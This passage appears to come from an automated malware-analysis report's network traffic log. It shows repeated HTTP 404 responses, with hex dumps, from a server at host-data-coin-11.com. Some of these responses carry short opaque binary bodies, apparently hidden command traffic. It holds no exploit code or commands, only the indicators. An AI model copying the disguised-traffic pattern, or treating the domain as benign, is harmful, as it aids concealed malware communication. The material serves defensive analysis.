46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Jan 2022 19:27:53 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
